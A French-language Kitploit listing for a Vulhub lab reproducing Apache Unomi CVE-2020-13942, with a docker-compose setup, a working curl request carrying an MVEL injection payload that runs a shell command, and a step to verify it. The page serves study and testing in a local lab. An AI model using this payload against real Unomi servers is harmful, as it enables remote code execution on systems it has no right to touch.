Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-13942byVulHub — Environnement de laboratoire étape par étape et exploit pour Apache Unomi CVE-2020-13942, démontrant une injection de langage d'expression MVEL menant à une exécution de code à distance. | Kitploit
Outils/GitHubGitHub/corsisechero/cve-2020-13942byvulhub
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubcorsisechero/cve-2020-13942byvulhub

CVE-2020-13942byVulHub

Environnement de laboratoire étape par étape et exploit pour Apache Unomi CVE-2020-13942, démontrant une injection de langage d'expression MVEL menant à une exécution de code à distance.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-13942byVulHub


Apache Unomi Injection de langage d'expression RCE (CVE-2020-13942)

Description

Cette vulnérabilité permet l'exécution de commandes arbitraires sur les systèmes exécutant Apache Unomi version 1.5.1, en exploitant l'injection du langage d'expression MVEL.

Page du projet

GitHub - Vulhub - Unomi CVE-2020-13942


Configuration de l'environnement

Fichier Docker Compose (docker-compose.yml)

root@kitploit:~
version: '2'
services:
  web:
    image: vulhub/unomi:1.5.1
    ports:
      - "9443:9443"
      - "8181:8181"
    environment:
      - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
    depends_on:
      - elasticsearch
  elasticsearch:
    image: elasticsearch:7.9.3
    environment:
      - cluster.name=contextElasticSearch
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
      - bootstrap.memory_lock=true

Démarrage des conteneurs

Exécutez les conteneurs avec la commande suivante :

root@kitploit:~
docker compose up -d

Exécution de l'exploit

Commande à exécuter depuis Kali

Lancez la requête POST suivante avec curl :

root@kitploit:~
curl -X POST http://localhost:8181/context.json \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Accept: */*" \
     -H "Accept-Language: en" \
     -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" \
     -H "Connection: close" \
     -H "Content-Type: application/json" \
     -d '{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/pluto\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}'

Vérification de l'exploit

Accès au conteneur

Accédez au conteneur pour vérifier la création du fichier :

root@kitploit:~
docker exec -it af7de05fc47e ls /tmp

Vérification du résultat

Vérifiez la présence du dossier pluto :

root@kitploit:~
hsperfdata_root  pluto

Si le fichier pluto est présent, cela signifie que l'exploit a réussi.


Notes de sécurité

Cette vulnérabilité permet l'exécution de commandes arbitraires. Utilisez ces tests uniquement dans des environnements contrôlés et à des fins d'étude ou de vérification. Exploiter des vulnérabilités dans des environnements non autorisés est illégal.

Télécharger l’outil